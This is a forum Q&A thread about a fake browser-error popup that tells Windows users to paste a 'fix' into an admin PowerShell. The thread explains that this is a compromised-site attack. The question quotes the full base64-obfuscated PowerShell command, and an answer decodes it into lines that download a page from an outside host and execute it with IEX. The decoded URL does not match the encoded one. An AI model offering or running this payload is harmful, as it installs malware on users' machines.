"Something went wrong" in Firefox, asks me to "Copy Fix"
I visited a website which showed me the following popup:

The text reads:
Something went wrong while displaying this webpage.

There was an error during the latest update of browser version, causing some web pages to malfunction.

Follow these instructions to resolve the issue:

Click the 'Copy fix' button below.
Right-click on the Windows icon
Select 'Windows PowerShell (Admin)'
Right-click within the open terminal window.
Wait for the update to complete, then refresh the page.

Copy Fix   Close

If I click on the "Copy Fix" button, the following text is copied to the clipboard.
ipconfig /flushdns
$Data = ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("JGc5MUYgPSAnaHR0cHM6Ly9nYW1lLmVtaWxpZWJvdWNoZXIuZnIvY29udGVudC9maXguaHRtbCcKJHYzOEsgPSBAeyAnVXNlci1BZ2VudCcgPSAnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEwMi4wLjAuMCBTYWZhcmkvNTM3LjM2JyB9CiR6MDRRID0gSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkZzkxRiAtVXNlQmFzaWNQYXJzaW5nIC1IZWFkZXJzICR2MzhLCiRjb250ZW50ID0gJHowNFEuQ29udGVudApJRVggJGNvbnRlbnQKY2xlYXItaG9zdAo="))); 
$DUMP = ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw=="))); 
$LIC = $Data + "; " + $DUMP; 
Invoke-Expression $LIC; 
exit;

Why has this appeared, and should I follow the instructions?
Edit: For the given site, the pop-up actually appears for any web browser, with the logo and browser name changing accordingly.

Can you provide a url of the website you visited?

Do Not Follow Those Instructions!!
This is a security attack. The website has been compromised, and is trying to get you to download a virus.
The "Copy Fix" text is a sequence of PowerShell commands that will download and execute a program on your machine, which will almost certainly be a virus.
If possible, report this problem to the website owners. For example, if it is a company, you may be able to contact them via a customer support email, or on social media.
More detail:
The copied text decodes to:
$g91F = 'https://aatt-as.com/pc.html'
$v38K = @{ 'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36' }
$z04Q = Invoke-WebRequest -Uri $g91F -UseBasicParsing -Headers $v38K
$content = $z04Q.Content
IEX $content
clear-host
Set-Clipboard -Value " ";

which downloads and then executes a file.
Edit:
I spoke with the administrators of the website I visited, and confirmed this was an attack. The pop-up only appeared to trigger on Windows machines. A large number of files had been injected with javascript referencing an "ethers-5.2" script. The website administrator was able to clean up these files, and resolve the issue.
